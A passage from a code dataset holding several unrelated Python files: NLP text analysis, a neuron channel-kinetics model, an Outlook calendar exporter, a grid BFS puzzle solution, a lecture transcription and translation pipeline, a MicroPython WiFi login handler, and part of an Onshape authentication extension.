0:\r\n\t\tverb_wordnet2.append(col[0])\r\n\telse:\r\n\t\tverb_wordnet2.append(\"verb.stative\")\r\n\r\n# Function for counting the frequency of a various categories of verb and noun\r\ndef count_elements(seq) -> dict:\r\n hist = {}\r\n for i in seq:\r\n hist[i] = hist.get(i, 0) + 1\r\n return hist\r\n\r\n# Histogram for categories of noun present in list 'noun1'\r\ncounted_noun1 = count_elements(noun_wordnet1)\r\nplt.bar(counted_noun1.keys(), counted_noun1.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of noun\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-1\")\r\nplt.show()\r\nprint(\"Total number of categories of noun:\", len(counted_noun1))\r\nprint(\"Count for different noun categories in book-1:\\n\", counted_noun1, \"\\n\")\r\n\r\n# Histogram for categories of verb present in list 'verb1'\r\ncounted_verb1 = count_elements(verb_wordnet1)\r\nplt.bar(counted_verb1.keys(), counted_verb1.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of verb\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-1\")\r\nplt.show()\r\nprint(\"Total number of categories of verb:\", len(counted_verb1))\r\nprint(\"Count for different verb categories in book-1:\\n\", counted_verb1, \"\\n\")\r\n\r\n# Histogram for categories of noun present in list 'noun2'\r\ncounted_noun2 = count_elements(noun_wordnet2)\r\nplt.bar(counted_noun2.keys(), counted_noun2.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of noun\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-2\")\r\nplt.show()\r\nprint(\"Total number of categories of noun:\", len(counted_noun2))\r\nprint(\"Count for different noun categories in book-2:\\n\", counted_noun2, \"\\n\")\r\n\r\n# Histogram for categories of verb present in list 'verb2'\r\ncounted_verb2 = count_elements(verb_wordnet2)\r\nplt.bar(counted_verb2.keys(), counted_verb2.values(), 0.7, color = 'g')\r\nplt.xlabel(\"Categories of verb\")\r\nplt.xticks(rotation = 90)\r\nplt.ylabel(\"Frequency for book-2\")\r\nplt.show()\r\nprint(\"Total number of categories of verb:\", len(counted_verb2))\r\nprint(\"Count for different verb categories in book-2:\\n\", counted_verb2, \"\\n\")\r\n\r\n\r\n\r\n# Loading the trainer for entity recognition and relationship\r\nsp = spacy.load('en_core_web_sm')\r\n\r\n# Splitting the data 'T1' paragraph-wise for entity recognition and putting the splitted data in the list 'data1'\r\ndata1 = T1.split(\"\\n\\n\")\r\nlg1 = len(data1)\r\n# Iterating 
over every paragraph present in the list 'data1' for entity recognition\r\nprint(\"\\t\\t\\t\\t\\tEntity recognition for BOOK-1:\")\r\nfor i in range(lg1):\r\n\tdoc = sp(data1[i])\r\n\tprint(\"\\n\\tParagraph No. -\", i+1)\r\n\tfor ent in doc.ents:\r\n\t\tprint(ent.text + ' - ' + ent.label_)\r\n\r\n# Splitting the data 'T2' paragraph-wise for entity recognition and putting the splitted data in the list 'data2'\r\ndata2 = T2.split(\"\\n\\n\")\r\nlg2 = len(data2)\r\n# Iterating over every paragraph present in the list 'data2' for entity recognition\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity recognition for BOOK-2:\")\r\nfor i in range(lg2):\r\n\tdoc = sp(data2[i])\r\n\tprint(\"\\n\\tParagraph No. -\", i+1)\r\n\tfor ent in doc.ents:\r\n\t\tprint(ent.text + ' - ' + ent.label_)\r\n\r\n# Recognizing relationships among various entities present in book-1 sentence-wise for each paragraph using 'data1'\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity Relationship for BOOK-1:\")\r\nfor i in range(lg1):\r\n\tdt1 = data1[i].split('.')\t\t\t\t\t\t\t\t\t\t\t\t# Splitting the paragraph present in 'data1' to create a list(dt1) of sentences for entity relationships\r\n\tfor j in range(len(dt1)):\r\n\t\tpiano_doc = sp(dt1[j])\r\n\t\tprint(\"\\n\\tParagraph No. -\", i+1, \", sentence no. -\", j+1)\r\n\t\tfor token in piano_doc:\r\n\t\t\tprint (token.text, token.tag_, token.head.text, token.dep_)\t\t\t\t\t\t# Finding and printing relationship among entities present in a sentence\r\n\r\n# Recognizing relationships among various entities present in book-2 sentence-wise for each paragraph using 'data2'\r\nprint(\"\\n\\t\\t\\t\\t\\tEntity Relationship for BOOK-2:\")\r\nfor i in range(lg2):\r\n\tdt2 = data2[i].split('.')\t\t\t\t\t\t\t\t\t\t\t\t# Splitting the paragraph present in 'data2' to create a list(dt2) of sentences for entity relationships\r\n\tfor j in range(len(dt2)):\r\n\t\tpiano_doc = sp(dt2[j])\r\n\t\tprint(\"\\n\\tParagraph No. -\", i+1, \", sentence no. 
-\", j+1)\r\n\t\tfor token in piano_doc:\r\n\t\t\tprint (token.text, token.tag_, token.head.text, token.dep_)\t\t\t\t\t\t# Finding and printing relationship among entities present in a sentence\r\n","repo_name":"Apoorv023/Natural-Language-Processing","sub_path":"Project Round - 2/nlpcode.py","file_name":"nlpcode.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15214329057","text":"#exec(open('kineticfunc.py').read())\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef kineticfunc1(Gbar, minfV, mtauV, hinfV, htauV, minfm80, hinfm80):\n #Assuming that at time=0, the channel is at steady state at -80mV.\n\n dt = 0.00001\n tlist = np.arange(0,0.5,dt)\n mlist = [minfm80 + dt*(minfV-minfm80)/mtauV]\n hlist = [hinfm80 + dt*(hinfV-hinfm80)/htauV]\n for t in tlist[1:]:\n mlist.append(mlist[-1]+dt*(minfV-mlist[-1])/mtauV)\n hlist.append(hlist[-1]+dt*(hinfV-hlist[-1])/htauV)\n G = Gbar*np.array(mlist)**1*np.array(hlist)\n return G\n\nat0 = kineticfunc1(1, 0.5,0.005, 0.5,0.050, 0,1)\nplt.figure(1)\nplt.plot(at0)\n\ndef kineticfunc2(t, Gbar, minfV, mtauV, hinfV, htauV, min, hin):\n #Assuming that at time=0, the channel is at steady state at -80mV.\n m = minfV + (min-minfV)*np.exp(-t/mtauV)\n h = hinfV + (hin-hinfV)*np.exp(-t/htauV)\n return Gbar*m*h\n\nat0 = [kineticfunc2(t, 1, 0.5,0.005, 0.5,0.050, 0,1) for t in np.arange(0,0.5,1e-5)]\nplt.figure(2)\nplt.plot(at0)\nplt.show()\n","repo_name":"analkumar2/Thesis-work","sub_path":"2019-11-12-kineticfeatures/kineticfunc.py","file_name":"kineticfunc.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19054543615","text":"import sys\r\nimport win32com.client\r\nfrom win32com.client import constants as c\r\nfrom ics import Calendar, Event\r\nimport chardet\r\n\r\nfrom dateutil import tz\r\nfrom dateutil.parser import parse\r\n\r\n\r\nclass MyOutlookCalendar(object):\r\n def __init__(self):\r\n self.outlook = win32com.client.Dispatch(\"Outlook.Application\")\r\n self.nsoutlook = self.outlook.GetNamespace(\"MAPI\")\r\n self.defaultCalendar = 9\r\n self.verbose = False\r\n\r\n # cal = ns.GetDefaultFolder(win32com.client.constants.olFolderCalendar)\r\n # inbox = mapi.GetDefaultFolder(win32com.client.constants.olFolderInbox)\r\n # \"6\" refers to the index of a folder - in this case, the inbox.\r\n # \"9\" is calendar\r\n '''\r\n how to reach any default folder not just \"Inbox\" here's the list:\r\n 3 Deleted Items\r\n 4 Outbox\r\n 5 Sent Items\r\n 6 Inbox\r\n 9 Calendar\r\n 10 Contacts\r\n 11 Journal\r\n 12 Notes\r\n 13 Tasks\r\n 14 Drafts\r\n \r\n use print_all_email_boxes or print_all_default_folders\r\n '''\r\n\r\n def enable_verbose(self):\r\n self.verbose = True\r\n\r\n def print_all_email_boxes(self):\r\n ''' Print all email boxes.'''\r\n\r\n for i in range(50):\r\n try:\r\n box = self.nsoutlook.Folders(i)\r\n name = box.Name\r\n print(i, name)\r\n except:\r\n pass\r\n\r\n def print_all_default_folders(self):\r\n ''' Print all default folders.'''\r\n\r\n for i in range(50):\r\n try:\r\n box = self.nsoutlook.GetDefaultFolder(i)\r\n name = box.Name\r\n print(i, name)\r\n except Exception as e:\r\n print(\"Exception: %s\" % (str(e)))\r\n pass\r\n\r\n def send_meeting_request(self, to, subject, location, start_time, end_time, body_text, all_day=False):\r\n '''\r\n Create item im calendar\r\n\r\n Set myItem = 
myOlApp.CreateItem(olAppointmentItem)\r\n myItem.MeetingStatus = olMeeting\r\n myItem.Subject = \"Strategy Meeting\"\r\n myItem.Location = \"Conference Room B\"\r\n myItem.Start = #9/24/97 1:30:00 PM#\r\n myItem.Duration = 90\r\n '''\r\n\r\n appt = self.nslookup.CreateItem(\r\n c.olAppointmentItem) # https://msdn.microsoft.com/en-us/library/office/ff869291.aspx\r\n appt.MeetingStatus = c.olMeeting # https://msdn.microsoft.com/EN-US/library/office/ff869427.aspx\r\n\r\n # only after setting the MeetingStatus can we add recipients\r\n appt.Recipients.Add(to)\r\n appt.Subject = subject\r\n appt.Location = location\r\n\r\n appt.Start = start_time\r\n\r\n appt.AllDayEvent = all_day\r\n\r\n end_time_list = end_time.split(\"/\")\r\n end_time_list[-2] = str(int(end_time_list[-2]) + 1)\r\n appt.End = \"/\".join(end_time_list)\r\n\r\n appt.Body = body_text\r\n # appt.Save()\r\n # appt.Send()\r\n appt.Display()\r\n return True\r\n\r\n def remove_accents(self, str):\r\n \"\"\"\r\n Thanks to MiniQuark:\r\n http://stackoverflow.com/questions/517923/what-is-the-best-way-to-remove-accents-in-a-python-unicode-string/517974#517974\r\n \"\"\"\r\n\r\n nkfd_form = unicodedata.normalize('NFKD', unicode(str))\r\n return u\"\".join([c for c in nkfd_form if not unicodedata.combining(c)])\r\n\r\n def remove_accents_bis(self, str):\r\n \"\"\"\r\n remove eszett char\r\n \"\"\"\r\n return str.replace('ß', 'ss')\r\n\r\n def get_my_calendar_event(self, start, end, recurence):\r\n\r\n icscal = Calendar()\r\n # master_recurrent_events_to_add = []\r\n known_guid_events = {}\r\n\r\n cal = self.nsoutlook.GetDefaultFolder(self.defaultCalendar)\r\n events = cal.Items\r\n\r\n # https://msdn.microsoft.com/en-us/library/office/gg619398.aspx\r\n events.Sort(\"[Start]\")\r\n print(\"REC: %s\" % (str(recurence)))\r\n events.IncludeRecurrences = (\"%s\" % (str(recurence)))\r\n\r\n # https://msdn.microsoft.com/EN-US/library/office/ff869427.aspx\r\n # Indicates the status of the meeting.\r\n # Name, Value, Description\r\n # olMeeting 1 The meeting has been scheduled.\r\n # olMeetingCanceled 5 The scheduled meeting has been cancelled.\r\n # olMeetingReceived 3 The meeting request has been received.\r\n # olMeetingReceivedAndCanceled 7 The scheduled meeting has been cancelled\r\n # but still appears on the user's calendar.\r\n # olNonMeeting 0 An Appointment item without attendees has been scheduled.\r\n # This status can be used to set up holidays on a calendar.\r\n\r\n # restrict by date\r\n restriction = (\"[Start] >= '%s' AND [End] < '%s'\" % (start, end))\r\n # restrict by date and type\r\n restriction = (\"([MeetingStatus] = 1 OR [MeetingStatus] = 3 OR [MeetingStatus] = 0) \"\r\n \" AND ([Start] >= '%s' AND [End] <= '%s')\"\r\n % (start, end))\r\n\r\n restricted_events = events.Restrict(restriction)\r\n\r\n for appointment_item in restricted_events:\r\n\r\n '''\r\n print(\"subj \" + appointment_item.Subject)\r\n if appointment_item.Location != \"\":\r\n print(\"loc \" + appointment_item.Location)\r\n print(\"start \" + str(appointment_item.StartUTC))\r\n print(\"end \" + str(appointment_item.EndUTC))\r\n print(\"allday \" + str(appointment_item.AllDayEvent))\r\n print(\"body \" + str(appointment_item.Body))\r\n print(\"busy \" + str(appointment_item.BusyStatus))\r\n print(\"cats \" + appointment_item.Categories)\r\n print(\"creationtime \" + str(appointment_item.CreationTime))\r\n print(\"duration \" + str(appointment_item.Duration))\r\n print(\"importance \" + str(appointment_item.Importance))\r\n print(\"recurring \" + 
str(appointment_item.IsRecurring))\r\n print(\"lastmod \" + str(appointment_item.LastModificationTime))\r\n print(\"recps \" + str(appointment_item.Recipients))\r\n print(\"recstate \" + str(appointment_item.RecurrenceState))\r\n print(\"reminderminb4 \" + str(appointment_item.ReminderMinutesBeforeStart))\r\n print(\"reqattendees \" + appointment_item.RequiredAttendees)\r\n print(\"\")\r\n print(\"\")\r\n '''\r\n if appointment_item.Subject == 'no meeting':\r\n continue\r\n if appointment_item.Subject == 'not available':\r\n continue\r\n if appointment_item.Subject == 'Daily meeting - update':\r\n continue\r\n\r\n event_to_add = True\r\n\r\n e = Event()\r\n e.name = appointment_item.Subject\r\n e.uid = appointment_item.EntryID\r\n e.created = appointment_item.CreationTime\r\n\r\n # TODO: need to fetched the recurrent attribute, as all meeting have the same UID.\r\n if appointment_item.IsRecurring:\r\n if not recurence:\r\n continue\r\n '''\r\n https://docs.microsoft.com/en-us/dotnet/api/microsoft.office.interop.outlook.olrecurrencestate?view=outlook-pia\r\n appointment_item.RecurrenceState\r\n olApptNotRecurring 0 The appointment is not a recurring appointment.\r\n olApptMaster 1 The appointment is a master appointment.\r\n olApptOccurrence 2 The appointment is an occurrence of a recurring appointment defined by a master appointment. \r\n olApptException 3 The appointment is an exception to a recurrence pattern defined by a master appointment.\r\n '''\r\n if self.verbose:\r\n print('recuring event name: ' + appointment_item.Subject +\r\n \" Date:\" + str(appointment_item.StartUTC) +\r\n \" State \" + str(appointment_item.RecurrenceState) +\r\n \" UID: \" + str(appointment_item.EntryID) +\r\n \" RecState \" + str(appointment_item.RecurrenceState))\r\n\r\n if recurence:\r\n recpat = appointment_item.GetRecurrencePattern()\r\n # print(recpat)\r\n print('Recurence StartDate: %s' % (str(recpat.PatternStartDate)))\r\n print('Recurence EndDate: %s' % (str(recpat.PatternEndDate)))\r\n print('Recurence StartTime: %s' % (str(recpat.StartTime)))\r\n print('Recurence EndTime: %s' % (str(recpat.EndTime)))\r\n print('Recurence Type %s' % (str(recpat.RecurrenceType)))\r\n '''\r\n https://docs.microsoft.com/en-us/office/vba/api/outlook.olrecurrencetype\r\n olRecursDaily 0 Represents a daily recurrence pattern.\r\n olRecursMonthly 2 Represents a monthly recurrence pattern.\r\n olRecursMonthNth 3 Represents a MonthNth recurrence pattern. See RecurrencePattern.Instance property.\r\n olRecursWeekly 1 Represents a weekly recurrence pattern.\r\n olRecursYearly 5 Represents a yearly recurrence pattern.\r\n olRecursYearNth 6 Represents a YearNth recurrence pattern. 
See RecurrencePattern.Instance property.\r\n '''\r\n print('------')\r\n\r\n if appointment_item.RecurrenceState != 1:\r\n # Store UID to fetch the master event...\r\n # if appointment_item.EntryID not in master_recurrent_events_to_add:\r\n # master_recurrent_events_to_add.append(appointment_item.EntryID)\r\n if recurence is False:\r\n event_to_add = False\r\n\r\n if event_to_add is False:\r\n continue\r\n\r\n if appointment_item.EntryID not in known_guid_events:\r\n known_guid_events[appointment_item.EntryID] = {}\r\n known_guid_events[appointment_item.EntryID]['count'] = 1\r\n known_guid_events[appointment_item.EntryID]['objects'] = []\r\n else:\r\n # if self.verbose:\r\n # print('Duplicate GUID detected: ' + str(appointment_item.EntryID))\r\n print(\r\n 'Duplicate GUID detected: ' + str(appointment_item.EntryID) + '\\n' + str(appointment_item.Subject))\r\n if recurence is False:\r\n delete(known_guid_events[appointment_item.EntryID])\r\n continue\r\n\r\n known_guid_events[appointment_item.EntryID]['count'] += 1\r\n\r\n if appointment_item.AllDayEvent is True:\r\n # For full day event, this is is stored in localtime in outlook and not UTC...\r\n # so start date is day - 1 and not day.\r\n # print('Is all day: Subject: %s' % (appointment_item.Subject))\r\n\r\n from_zone = tz.tzutc()\r\n to_zone = tz.tzlocal()\r\n utc = parse(str(appointment_item.StartUTC))\r\n utc = utc.astimezone(to_zone)\r\n utc = str(utc).split('+')[0]\r\n e.begin = utc\r\n e.make_all_day()\r\n\r\n else:\r\n e.begin = appointment_item.StartUTC\r\n e.end = appointment_item.EndUTC\r\n # e.duration = appointment_item.Duration\r\n\r\n body_detect = chardet.detect(appointment_item.Body.encode('utf-8'))\r\n if body_detect['encoding'] == 'ascii':\r\n e.description = appointment_item.Body\r\n elif body_detect['encoding'] is None:\r\n e.description = appointment_item.Body\r\n elif body_detect['encoding'] == 'utf-8':\r\n e.description = appointment_item.Body.encode('utf-8').decode('utf-8', 'ignore')\r\n elif body_detect['encoding'] == 'ISO-8859-1':\r\n e.description = appointment_item.Body.encode('utf-8').decode('iso-8859-1', 'ignore')\r\n elif body_detect['encoding'] == 'ISO-8859-15':\r\n e.description = appointment_item.Body.decode('iso8859_15', 'ignore')\r\n elif body_detect['encoding'] == 'Windows-1252':\r\n try:\r\n e.description = appointment_item.Body.decode('windows-1252', 'ignore')\r\n except Exception as err:\r\n # e.description = ''\r\n e.description = appointment_item.Body\r\n print('Unknown encoding: %s' % (body_detect))\r\n print('Exception: %s' % (str(err)))\r\n print('Subject: %s' % (appointment_item.Subject))\r\n else:\r\n print('Unknown encoding: %s' % (body_detect))\r\n e.description = ''\r\n e.description = e.description.replace('\\r', '')\r\n\r\n if appointment_item.Location != \"\":\r\n e.location = appointment_item.Location\r\n\r\n # TODO: Alarm\r\n # TODO print(\"reminderminb4 \" + str(appointment_item.ReminderMinutesBeforeStart))\r\n\r\n if event_to_add:\r\n icscal.events.add(e)\r\n\r\n known_guid_events[e.uid]['objects'].append(e)\r\n\r\n # if self.verbose:\r\n # for event in master_recurrent_events_to_add:\r\n # print('need to fetch master event with uid:' + str(event))\r\n\r\n return (icscal.events, known_guid_events)\r\n\r\n\r\nif __name__ == '__main__':\r\n 
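# library module only: exit immediately when run as a script\r\n    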
sys.exit(0)\r\n","repo_name":"LittleKaosLilly/outlook2caldav","sub_path":"lib/myoutlook.py","file_name":"myoutlook.py","file_ext":"py","file_size_in_byte":13824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"43980174931","text":"from collections import deque\n\nN = int(input())\n\ndr = [0, 1, 0, -1]\ndc = [1, 0, -1, 0]\nanswer = int(1e9)\n\ngraph = []\nvisited = [[False for i in range(N)] for j in range(N)]\nfor i in range(N):\n    graph.append(list(map(int, input().split())))\n\nnum = 1\nfor row in range(N):\n    for col in range(N):\n        if visited[row][col]:\n            continue\n        if graph[row][col] == 0:\n            continue\n        q = deque()\n        q.append((row, col, num))\n        visited[row][col] = True\n        graph[row][col] = num\n        while q:\n            c_row, c_col, c_num = q.popleft()\n            for i in range(4):\n                n_row = c_row + dr[i]\n                n_col = c_col + dc[i]\n                if n_row < 0 or n_col < 0 or n_row >= N or n_col >= N:\n                    continue\n                if visited[n_row][n_col]:\n                    continue\n                if graph[n_row][n_col] == 0:\n                    continue\n\n                graph[n_row][n_col] = num\n                visited[n_row][n_col] = True\n                q.append((n_row, n_col, c_num))\n        num += 1\n\n\nfor row in range(N):\n    for col in range(N):\n        if graph[row][col] == 0:\n            continue\n\n        q = deque()\n        visited = [[False for i in range(N)] for j in range(N)]\n        num = graph[row][col]\n        q.append((row, col, 0))\n\n        while q:\n            c_row, c_col, dist = q.popleft()\n            for i in range(4):\n                n_row = c_row + dr[i]\n                n_col = c_col + dc[i]\n                if n_row < 0 or n_col < 0 or n_row >= N or n_col >= N:\n                    continue\n                if visited[n_row][n_col]:\n                    continue\n                if graph[n_row][n_col] == num:  # came back to the original island\n                    continue\n                if graph[n_row][n_col] != num and graph[n_row][n_col] != 0:\n                    answer = min(answer, dist)\n\n                visited[n_row][n_col] = True\n                q.append((n_row, n_col, dist+1))\n\nprint(answer)\n","repo_name":"pickac4rd/boj","sub_path":"2146.py","file_name":"2146.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1042432584","text":"import asyncio\n\nfrom App import ConfApp\nfrom Inc.ApiParse import QueryToDict\nfrom IncP.Util.UHrd import Reset\n\n\nasync def DoUrl(aParent, aReader: asyncio.StreamReader, aWriter: asyncio.StreamWriter, aHead: dict):\n    LenData = int(aHead.get('content-length', '0'))\n    if (LenData > 0):\n        R = 'about to reboot'\n\n        Data = await aReader.read(LenData)\n        Query = QueryToDict(Data.decode('utf-8'))\n        ConfApp['STA_ESSID'] = Query.get('_STA_ESSID')\n        ConfApp['STA_Paswd'] = Query.get('_STA_Paswd')\n        ConfApp.Save()\n\n        Reset()\n    else:\n        R = 'No data'\n\n    await aParent.Answer(aWriter, 200, 'txt', R)\n","repo_name":"VladVons/mpy-vRelay","sub_path":"src/App/HttpSrv/p_login.py","file_name":"p_login.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74503146705","text":"from . 
import workers\nimport zipfile, os, tempfile, subprocess, re, traceback\nimport operator\nfrom datetime import datetime, timedelta\n\ndef convert_to_wav(source, ext):\n\n with tempfile.NamedTemporaryFile(mode='w+b', suffix=ext) as sourcefile, \\\n tempfile.NamedTemporaryFile(mode='r+b', suffix='.wav') as resultfile:\n\n sourcefile.write(source)\n\n command = ['ffmpeg', '-nostdin', '-y', '-i', sourcefile.name, '-acodec', 'pcm_s16le', '-ar', '16000', '-ac', '1', resultfile.name]\n p = subprocess.run(command, text=True, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n return (resultfile.read(), '---STDOUT---\\n' + p.stdout + '\\n---STDERR---\\n' + p.stderr, )\n\n\ndef segment_audio(audio, name):\n \n with tempfile.NamedTemporaryFile(mode='w+b', suffix='.wav') as sourcefile, \\\n tempfile.NamedTemporaryFile(mode='r+', suffix='.seg') as resultfile:\n\n sourcefile.write(audio)\n\n command = ['./worker_scripts/segment_audio.sh', sourcefile.name, resultfile.name, name]\n p = subprocess.run(command, text=True, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n return (resultfile.read(), '---STDOUT---\\n' + p.stdout + '\\n---STDERR---\\n' + p.stderr, )\n\ndef format_seg_as_stm(segmentation):\n\n #TODO is sorting really necessary or is seg already in order\n\n\n dic = {}\n for line in segmentation.splitlines():\n name0, name1, start_str, end_str = line.split()\n start = float(start_str)\n end = float(end_str)\n dic[start] = f'{name0}_{int(start*100):07}_{int(end*100):07} {name1} {start:.2f} {end:.2f}\\n'\n \n result = [ line for _, line in sorted(dic.items()) ]\n\n return ''.join(result)\n\n\ndef stm_to_vtt_time(time):\n td = timedelta( seconds=round(float(time), 3) )\n #dummy date, important is the time 00:00:00.000000\n time = datetime(1970, 1, 1)\n #we need the datetime, since time + timedelta isn't supported\n time += td\n time = time.time()\n return time.isoformat('milliseconds')\n\ndef set_to_vtt(text):\n result = \"WEBVTT \\n\\n\"\n log = \"\"\n for line in text.splitlines():\n line = line.strip() \n try:\n start, end, *hypo = line.split()\n except ValueError:\n log += f'badly formatted line {line}'\n continue\n hypo = ' '.join(hypo)\n start = stm_to_vtt_time(start)\n end = stm_to_vtt_time(end)\n result += f\"{start} --> {end} \\n\"\n result += hypo + \"\\n\\n\"\n\n return result, log\n\n\ndef run_workers(task):\n\n task.status = task.PROCESSING\n task.save()\n\n #TODO reading the whole file to pass it to workers might cause memory issues\n with task.source.open('rb') as src_file, task.result.open('wb') as res_file, task.log.open('wb') as log_file:\n with zipfile.ZipFile(src_file, 'r') as src_zip, zipfile.ZipFile(res_file, 'w') as res_zip, zipfile.ZipFile(log_file, 'w') as log_zip:\n for filename in src_zip.namelist():\n\n try:\n\n source = src_zip.read(filename)\n folder, ext = os.path.splitext(filename)\n\n #Convert\n audio, log = convert_to_wav(source, ext)\n res_zip.writestr(f'{folder}/audio.wav', audio)\n log_zip.writestr(f'{folder}/convert_audio.log', log)\n print('Conversion done')\n\n #Segmentation\n segmentation, log = segment_audio(audio, folder)\n res_zip.writestr(f'{folder}/segmentation.txt', segmentation)\n log_zip.writestr(f'{folder}/segment_audio.log', log)\n print('Segmentation done')\n\n #ToSTM\n segmentation = format_seg_as_stm(segmentation)\n res_zip.writestr(f'{folder}/segmentation.stm', segmentation)\n print('STM Done')\n\n #ASR\n text, log, *additional = workers.asr_worker(audio, segmentation, task.language)\n 
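# asr_worker also returns extra payloads (*additional) that are forwarded to the MT step below\n                    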
res_zip.writestr(f'{folder}/transcript.txt', text)\n log_zip.writestr(f'{folder}/transcribe_audio.log', log)\n print('ASR done')\n\n #ToVtt\n try:\n vtt, log = set_to_vtt(text)\n res_zip.writestr(f'{folder}/transcript.vtt', vtt)\n log_zip.writestr(f'{folder}/text_to_vtt.log', log)\n except Exception:\n log_zip.writestr(f'{folder}/text_to_vtt.log', traceback.format_exc())\n print('Vtt done')\n\n #MT\n if task.translations:\n for code, translation, log in workers.mt_worker(text, task.language, task.translations, source, segmentation, *additional):\n res_zip.writestr(f'{folder}/translation_{code}.txt', translation)\n log_zip.writestr(f'{folder}/translate_to_{code}.log', log)\n print('MT done')\n\n except Exception:\n log_zip.writestr(f'{folder}/error.log', traceback.format_exc())\n\n task.status = task.DONE\n task.save()\n","repo_name":"Doomse/Lecture_Translator","sub_path":"LT_UI/tasks/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1042432584","text":"from App import ConfApp\nfrom Inc.ApiParse import QueryToDict\nfrom IncP.Util.UHrd import Reset\n\n\nasync def DoUrl(aParent, aReader: asyncio.StreamReader, aWriter: asyncio.StreamWriter, aHead: dict):\n LenData = int(aHead.get('content-length', '0'))\n if (LenData > 0):\n R = 'about to reboot'\n\n Data = await aReader.read(LenData)\n Query = QueryToDict(Data.decode('utf-8'))\n ConfApp['STA_ESSID'] = Query.get('_STA_ESSID')\n ConfApp['STA_Paswd'] = Query.get('_STA_Paswd')\n ConfApp.Save()\n\n Reset()\n else:\n R = 'No data'\n\n await aParent.Answer(aWriter, 200, 'txt', R)\n","repo_name":"VladVons/mpy-vRelay","sub_path":"src/App/HttpSrv/p_login.py","file_name":"p_login.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74456440144","text":"import omni\nimport carb\nimport weakref\nimport gc\n\ntry:\n # from onshape_client import Client\n # import onshape_client\n from omni.isaac.onshape.onshape_client import Client\n import omni.isaac.onshape.onshape_client as onshape_client\nexcept ImportError:\n carb.log_warn(\"onshape dependencies not found. 
attempting to install...\")\n # the package name and module names are different, so install at runtime and ignore the import check.\n omni.kit.pipapi.install(\n \"requests-oauthlib\", version=\"1.3.0\", extra_args=[\"--no-dependencies\"], ignore_import_check=True\n )\n omni.kit.pipapi.install(\"ruamel.yaml\", version=\"0.17.16\", extra_args=[\"--no-dependencies\"])\n # this module cannot be directly imported\n omni.kit.pipapi.install(\n \"ruamel.yaml.clib\", version=\"0.2.6\", extra_args=[\"--no-dependencies\"], ignore_import_check=True\n )\n omni.kit.pipapi.install(\"nulltype\", version=\"2.3.1\", extra_args=[\"--no-dependencies\"])\n # omni.kit.pipapi.install(\"onshape_client\", version=\"1.6.3\", extra_args=[\"--no-dependencies\"])\n # from onshape_client import Client\n # import onshape_client\n from omni.isaac.onshape.onshape_client import Client\n import omni.isaac.onshape.onshape_client as onshape_client\n\nimport omni.ui as ui\nfrom concurrent.futures import ThreadPoolExecutor\n\nimport json\n\nimport webbrowser\nfrom urllib.parse import urlparse, parse_qs\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\n\nfrom threading import Lock\n\n\nclass TimeoutException(Exception):\n pass\n\n\nfrom .scripts.definitions import (\n USE_ONSHAPE_KEY,\n DEFAULT_ONSHAPE_KEY,\n DEFAULT_ONSHAPE_SECRET,\n ONSHAPE_BASE_URL,\n ONSHAPE_AUTH_URL,\n ONSHAPE_TOKEN_URL,\n)\n\n\n# class ThreadWithException(threading.Thread):\n# def __init__(self, bucket):\n# threading.Thread.__init__(self)\n\n\ndef set_api_keys(key, secret):\n carb.settings.get_settings().set(DEFAULT_ONSHAPE_KEY, key)\n carb.settings.get_settings().set(DEFAULT_ONSHAPE_SECRET, secret)\n\n\ndef do_auth():\n try:\n d = OnshapeClient.get().documents_api.get_documents()\n if d:\n OnshapeClient.set_authenticated(True)\n\n except Exception as e:\n carb.log_error(\"Onshape Authentication Error: {}\".format(e))\n OnshapeClient.__stop_request = True\n return False\n\n\ndef callback(q=None):\n OnshapeClient.auth_callback()\n\n\nclass AuthWindow(ui.Widget):\n def __init__(self, parent):\n self.parent = parent\n self.executor = ThreadPoolExecutor(max_workers=1, thread_name_prefix=\"onshape_authentitator_pool\")\n\n self.build_widget()\n\n def start_auth(self, callback_fn):\n # Process(target = auth_method, args=(self.queue,))\n\n OnshapeClient.__stop_request = False\n OnshapeClient.set_auth_callback(lambda a=self, c=callback_fn: a.done_auth(c))\n self.task = self.executor.submit(do_auth)\n\n self.task.add_done_callback(callback)\n # do_auth(OnshapeClient.get())\n # callback(0)\n\n def build_widget(self):\n with ui.VStack(alignment=(ui.Alignment.CENTER)):\n ui.Label(\"Onshape Authentication in Progress\", alignment=(ui.Alignment.CENTER))\n self.cancel_btn = ui.Button(\"Cancel\", clicked_fn=lambda: weakref.proxy(self).cancel_auth())\n ui.Spacer(height=5)\n\n def cancel_auth(self):\n # self.process.terminate()\n self.parent.visible = False\n OnshapeClient.__stop_request = True\n OnshapeClient.stop_httpServer()\n # for pid, process in self.executor._processes.items():\n # process.terminate()\n self.executor.shutdown(wait=False)\n OnshapeClient.set_auth_callback(None)\n # self.queue.put(False)\n\n def done_auth(self, callback):\n # r = self.queue.get()\n # done = False\n # if len(r) > 1:\n # done = r[1]\n self.parent.visible = False\n if 